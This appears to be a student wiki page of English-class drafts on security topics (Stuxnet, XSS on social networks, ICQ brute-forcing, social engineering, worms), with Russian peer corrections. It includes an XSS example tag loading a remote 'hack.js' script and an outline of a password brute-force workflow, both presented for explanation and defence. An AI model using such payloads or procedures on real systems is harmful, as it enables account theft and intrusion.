12.04

Stuxnet virus.(исправил те ошибки и добавил информации ) 1. In June,2010 an unknown virus was detected not only on usual users’ computers, but also in big industrial systems. So, what was this virus? 2. win32/Stuxnet is a computer worm that infects computers running the Microsoft Windows operating system. 3. This virus uses four previously unknown vulnerabilities of Microsoft Windows system (0-day) for infecting computers. Rather (вернее), two of them were known, but they were poorly studied. This vulnerabilities are aimed at the virus dissemination with USB-flash drives. Stuxnet escapes anti-virus programs with the help of real digit signatures. This is the first known computer worm which intercepts and modifies the flow of information between programmable logic controllers SIMATIC S7 and workstations of SCADA-system from Siemens SIMATIC WinCC.

4. Stuxnet can be used as a means of unauthorized data collection (spying) and sabotage in thePCS(process control system) industry, power plants, airports, etc.). When the worm started to work, he changed the frequency of the centrifuge and they damaged seriously.As the virus had done it ,the station operators fed the same traffic that Stuxnet had collected during the first two weeks,so they did not even that"something is wrong"as long as the car, literally, nottorn into pieces. Finally,the most beautiful part of this procedure: the virus deactivated the «Kill swiches» -emergency circuit breakers, so it was not possible even physically to stop the controllers work.

5.The virus is obviously created by the team of professionals, because:
 * The size of the source code of the virus is approximately 500 KB of code in assembly language, C and C + +;
 * The purposes are too serious for an usual hacker;
 * The hackers were likely to steal the signature of theTaiwanese firms MicronJ offices and RealTek. A strangefact, but the offices of these firms are in the same building in Shinchu. If this is not a mere coincidence, it means that someone physically entered the room, went to the appropriate computers,stole the keys. It’s not an amateur job.
 * Definitely, there was some type of data exfiltration ,not to mention the programming skills which are necessary fort his kind of work" -says Patrick Gardner, the director of Symantec information security group .As for skills of Stuxnet authors, they were not just on top.In the worm was built 15 different modules and 5 hiding mechanisms, two rootkits, one for the PC and a controller for Siemens,which uses a custom built operating system called Step7.

60 % of infections were detected in Iran. So, there is an opinion that Stuxnet was created by Israeli security forces for stopping Iran's nuclear project. 6. Freetool to remove the virus Stuxnet can be found on the technical site of BitDefender - MalwareCity.com Also, According to the Rainbow security company's report,hardware devicesCodeMeter, which is produced byWibu-Systems company,provide protectionthe wormStuxnet. Implementation of the CodeMeter technology allows developers to storage on flash memory devices, which is made according to industry standards, not just the protected software product, but the operating system too (Windows XP Embedded, Windows CE, Linux, Windows XP, Windows 7, VxWorks, etc. .) The hardware solutions in the form of USB-key CmStick, mobile cards Compact Flash, Secure Digital, or micro-Secure Digital allow to controlthe integrity of the supplied software package and its using based on licensing models and to protect the know-how and critical code from cybercriminals. 7. Computer security specialists have detected signs of new virus. The type of this virus is similar to the one of Stuxnet, and this virus has jeopardized the Iran’s nuclear program. This virus is named Duqu. Probably, Stuxnet and Duqu have the same source. Duqu was found by virus specialists of Symantec company, which produces anti-virus software. "Unlike a virus Stuxnet, Duqu doesn’t contain the code to break into the control system and does not reproduce on its own," - said the statement. In other words, this virus was created to steal the information, which can be used for diversions. Symantec Chief Technology Officer Greg Day told BBC that Duqu is a very complex virus. "It's not a virus written by a teenager,it uses the most modern technology, and it means that Duqu was created by someone who meant to apply it for a very definite purpose," - he said. 8. Detection of the Stuxnet completely changed the situation in the field of computer security and forced many countries to strengthen the protection of its vital industrial facilities, particularly in energy and water supply. And if computer security experts of all the world will not improve methods of protection from such viruses, we will get a nuclear catastrophe like the Chernobyl accident or even much worse. user:Kurorisu P.S. Новая информация со следущих источников:

http://habrahabr.ru/post/123030/#habracut http://www.bytemag.ru/articles/detail.php?ID=18259

Тема, я ушла, извините :) 21.54

Вытащила Лёшину работу. Чего это она удалилась?

 In my report, I will tell you about Cross Site Scripting in social media. Cross Site Scripting, is also referred to as XSS.

 This occurs when you allow HTML, or more often JavaScript code, to be input by a user and then displayed back by your website. __One place this is common is in a comment form.__ это надо грамотно переписать (я помогу, если что) What most often happens is that a malicious user will try to write the code that steals cookies from your site’s users, allowing him or her to discover username and password pairs or other information. Even worse, the malicious user might launch an attack to download a Trojan on a user’s computer.

 The first major worm to use Cross-Site Scripting was "Samy Worm1". On October 4, 2005, the "Samy Worm1" altered over one million personal user profiles on MySpace.com.

 As I said earlier, attackers using XSS attacks are trying to get a username and password. Suppose an attacker knows your username and password from your account on a social network. Thus, an attacker can gain access to your personal correspondence, which may well be confidential information. In addition, many users use the same password for both accounts in the social network and e-mail. Thus, a person who was subjected to XSS attack, risk s of losing access not only to your account on a social network but also to his email box.

 In social media, +there are a lot of different forms of input, so they are most vulnerable to XSS attacks. Just to register in the social network, the user must fill in a lot of input fields, such as "e-mail", "name", "adress", "interests", etc. Each of these fields is potentially vulnerable to XSS attacks. In many social networks, each user has a personal page that any user can leave a message. The attackers try to use this possibility: they can run malicious JavaScript code on the user's computer, only after he goes to someone's personal page.  Preventing this attacks is as simple as calling the “htmlentities” function, which strips out all HTML markup codes and replaces them with a form that displays the characters, but does not allow a browser to act on them. For example, consider the following HTML:    hack;  This code loads in a JavaScript program and then executes malicious functions. But if it is first passed through “htmlentities” function, it will be turned into the following, totally harmless string:  &lt;  script src=' http://x.com/hack.js  '  &gt;  &lt;/  script  &gt;&lt;  script <span style="color: #ff0000; font-family: Arial,sans-serif; font-size: 13.3333px;"> &gt; <span style="font-family: Arial,sans-serif; font-size: 13.3333px;"> hack; <span style="color: #ff0000; font-family: Arial,sans-serif; font-size: 13.3333px;"> &lt; <span style="font-family: Arial,sans-serif; font-size: 13.3333px;"> /script <span style="color: #ff0000; font-family: Arial,sans-serif; font-size: 13.3333px;"> &gt; <span style="font-family: Arial,sans-serif; font-size: 13.3333px;"> However, the browser will show to the user the original version of the code. <span style="font-family: Arial,sans-serif; font-size: 13.3333px;"> Despite the fact that the fight against such attacks is simpl ye, XSS-attacks are popular to __this da__y. these days In today's social networks, there are so many input fields that __provide all the vulnerabilities__ непонятно for XSS-attacks +is almost impossible.

<span style="font-family: Arial,sans-serif;"> Aleksey Tsykarev <span style="font-family: Arial,sans-serif;"> Вот мой довольно сырой пока вариант... Что скажите? <span style="color: #ff0000; font-family: Arial,sans-serif;">выглядит нормально :) Надеюсь, что ещё будут интересные иллюстрации или, возможно, конкретные примеры "ужасных разрушений" в соц. сетях. :)

I would like to tell you about the most common of them, about brute force.
 * 1. ** Unfortunately, the __wirtual__ ** v ** irtual world as a whole and +the system of an instant exchange of instant messages in particular are available to intruders. More often in the IM the following types of illegal activity are carried out:
 * Theft of passwords to accounts of IM clients by search of passwords (brute force) or luring them __at__ непонятно users by means of methods of social engineering.
 * The spread of malware.
 * Spam mailing


 * 2. ** For brute force, hackers use some programs. These include the “brute” (a program __to hack__ for hacking?её ведь не саму взламывают ), a program to compile the proxy list and the UIN generator.


 * 3. ** To start ,a hacker creates a proxy list. You can find it online or create a proxy list through the program, such as “Forum Proxy Leecher”. Then we must get rid of “dead” proxy. “Dead” is proxy, whose ping is equal to 0. After that we start to use UIN generator. This program allows us to create a list of species “uin;password”, where uin is the number icq number number of the victim, password – generated password. We then use our "brute." We load the program proxy list and a list of “uin;password”, previously created, and run it. The program takes a combination of username-password forms from this query, sends a request to the server using a proxy. The program then receives a response from the server and parses it.


 * 4. ** +The Best protection against brute force is a complex password. And so the same should always have __primary__ это о чём? e-mail.

In general, there are a few rules. Here are the most common ones:
 * First, the user must be careful not to mindlessly click on the link in the received message.
 * You must have an antivirus installed with the updated database and a firewall that blocks unauthorized access to the network.
 * The user should use anti-spam a bot.
 * 5. ** Do you need protection? I think inthe protection against IM of attacks needs is needed by everyone who worries about confidentiality and safety of the data in various social networks.


 * 6. ** In August, 2010 new administration +of ICQ has decided to refuse __from primary an e-mail in advantage attach an e-mail.__ Это непонятно Primary e-mail couldn't be replaced, while the owner of ICQ of number could __change attach e-mail__ что-то не так if the old e-mail was lost. However, for protection against __fraud stealing__ что это такое? numbers, in case of __attach e-mail__ ?? change, the letter with confirmation came to +the old mail +address? . Everything __would seem is provided__. тоже не понятно But the bug has been found in +the system. It appears if to become authorize d on site ICQ.COM site, to remove all data having pressed the button then to enter +a new __attach e-mail__, +the old attach e-mail replaces +a new +one without confirmation arrival confirmation with it. In January, 2011 developers have corrected this bug on a site icq.com site . Mass theft of ICQ of numbers ended.


 * 7. ** As it was already told, programs for an instant exchange of messages exchange are very attractive to different malefactors. I n this connection the problem of distribution of malicious software through IM clients costs is rather sharply. New versions of __clients unknown contain for the time being vulnerabilities__ этот кусочек я вовсе не поняла which can be found at first by hackers, and only then – +by the founders of the program. Such situations are fraught with mass epidemics. Besides, many users are disturbed by undesirable messages (IM spam).

Specific means of protection of IM clients at present doesn't exist at present, however observance of elementary rules of «computer hygiene», correctly adjusted anti-spam bot, and also attentiveness and prudence allow users to resist successfully to Internet swindlers and quietly to enjoy communication in the Network.

1334081800 всё хорошо, только нужно доработать не очень удачные словосочетания

Social engineering

1.What is social engineering?

Social engineering - is a method of controlling the actions of a person without the use of technological tools. This method is based on the weaknesses of the human factor and is very destructive. Analyzing the causes and methods of hacking software, scientists have come to a very interesting conclusion, which is approximately eighty per cent of the reason for this - the human factor. __A stunning experiment conducted British researchers.__ здесь лучше поменять порядок слов на прямой, а то эксперимент провёл исследователей. They sent employees +of a large corporation a letter supposedly from their company's system administrator to provide their passwords, because __is planned equipment check__. здесь тоже нужен прямой порядок слов __Responded to this letter, 75% of employees by investing in a letter to your password__. а здесь всё предложение написано непонятно каким порядком. :( As they say, no comment. This It is not the people are so stupid, it's easy to program the human actions.

2. The history of social engineering.

Very often, the "father of social engineering" __is the name of Kevin Mitnick__, "Mitnick is called ... " which is not entirely true. Mitnick was one of the first to apply the art of manipulating a person in relation to a computer system, hacking a person who works at a computer. After that, everything connected with the theft of information by manipulating the man became known as social engineering.

In fact, all the methods to manipulate a man +have been known for a long time, and most of these methods came to the social engineering from an arsenal of different intelligence agencies.

3. Social engineering today.

Today, the human factor in information security is more important than 20 years ago when the Internet was not a commercial, and its users were only specialists. Social engineering often use s the Internet to obtain sensitive information or information which is of great value.

4. Why malefactors use a social engineering?

- This is easier than to break technical security system.

- Such attacks are not __computed__?? with the help of technical means of information protection.

- It is inexpensive.

- The risk is minimal.

- Works with any operating system.

- Effective ly almost 100%.

5. Social engineering in the future.

According to many experts, the greatest threat to information security, both large companies and ordinary users in the next decade will be more and more __improving__ developed? social engineering techniques used to break the existing means of protection.

Why are do many researchers believe that social engineering will be one of the main tools of hackers of the XXI century?

The answer is simple. Because technical protection system will be more and more improved, and the people __well as will__ ?? continue to be people with their weaknesses, prejudices, stereotypes, and will be the weakest link in the chain of security. You can put the most advanced security systems, but still in your security scheme there is one very unreliable link – people. Because, as Albert Einstein said: «Two things are infinite: the universe and human stupidity; and I'm not sure about the universe.»

The sources:

1) Maxim Kuznetsov, Igor Simdyanov "Social engineering and social hackers"

2) [|http://ru.wikipedia.org/wiki/Социальная_инженерия_(безопасность)]

3) []

4) [] - examples of social engineering

Oleg. без примеров скучновато немножко

Nowdays computer worms are __very__ этим словом усиливать нельзя: и так уже написано "wide" - в таких случаях пишут "extremely" или что-то такое же эмоциональное widespread. Let’s talk about them.

//начало поменяла// // Each of us has __ever__ ** это обычно в вопросах употребляется, напр. Have you ever loved a woman? (песня такая :))) ) ** faced with computer viruses and there are viruses named “computer worms”. Let’s talk about them. // // Computer worm is a type of malicious program, which is self-propagating through local and global computer networks. // // There are 2 main types of worms. The first +one is a resident worm. It can infect the working program and stay at RAM, without damaging the hard disks. So you should restart your computer to neutralize this worm. The second type is worm, which saves its code on the hard disk after infection. Then it writes some keys in the Windows registry to its future launching. You can neutralize it only using the antiviruses. //

// Now some words about mechanisms of spreading. They are divided into 2 big groups. The first group uses vulnerabilities and administration mistakes of the software installed on the computer. These worms can spread independently, they choose and attack computers in a automatic mode. A good example of this type is Morris worm, it is the first computer worm. The second type uses the principles of social engineering, so the user launches the malicious software by himself. This method is widely spread in spam mails, social networks, etc. A famous example of these worms is virus ILOVEYOU or Love letter. // // Now, I would like to tell you something about this virus and about Morris worm. //

// On November 2, 1988, specialists registered the first case of the computer worm appearance that had paralyzed the work of six thousand Internet sites in the United States. The author of this virus is the student of faculty of Computer science at Cornell University, Robert T. Morris. The epidemic arose because __he pointed too small number for a period of rewriting copy of the virus.__ В этой фразе я не могу разобраться. С определённой периодичностью программа так или иначе перезаписывала свою копию. Слишком маленькое число, заданное Робертом для описания периодичности, и послужило причиной первой в мире эпидемии сетевого червя. ** The number that Robert had set for ... was too small. which caused ... ** A small logic error in the program code of the program led to destructive results. Computers repeatedly caught a worm, and each additional __instance__ пример? http://lingvo.yandex.ru/instance/с%20английского/LingvoComputer/ тут есть значение "копия"; хотя да, можно просто copy написать =) ** это понятнее будет ** slowed down the work of the computer, completely exhausting computer’s resources. This worm used known vulnerabilities of mail servers and selection of passwords to a dictionary. The dictionary wasn’t very big: for about 400 words, and in 1980s information security was very weak, so it was simple to infect +what? computers  . The damage from the Morris worm was estimated at about $ 96 million. //

// On May 3, 2000, the virus ILOVEYOU was sent to the mailboxes from the Philippines. In the subject of letter +it was written “ILoveYou”, and the script named «LOVE-LETTER-FOR-YOU.TXT.vbs» was added. When the user launched the script, the virus sent its copy to all user’s contacts and made some malicious changes in user’s system. The virus has infected more than 3 million computers worldwide. The damage, which the worm caused +in по-моему, с предлогом лучше the world economy, was estimated at $ 10-15 billion dollars. So it was included in the Guinness Book of records as the most destructive computer virus in the world. //

добавила абзац про новый червь Stuxnet is a computer worm discovered in June 2010. This virus uses four previously unknown vulnerabilities of Microsoft Windows system for infecting computers. These __vulnerabilities are aimed__ уязвимости нацелены? at the virus dissemination with USB-flash drives. The worm Stuxnet - is a multipurpose tool of industrial espionage, it is intended to gain access to the operating system, which is responsible for processing, data collection and management of industrial objects. In contrast to the majority of similar viruses, the main purpose of Stuxnet may be not a data theft, but a damage of industrial automation systems. Worms of this class can secretly be in the system in sleep mode and at a specified moment it gives commands to damage the industrial equipment. Ну, прямо Джеймс Бонд, а не вирус! Ещё бы какой-нибудь реальный пример!

информацию брала тут http://ru.wikipedia.org/wiki/Сетевые_черви http://ru.wikipedia.org/wiki/Червь_Морриса http://ru.wikipedia.org/wiki/VBS.LoveLetter

user:LenaBerezkina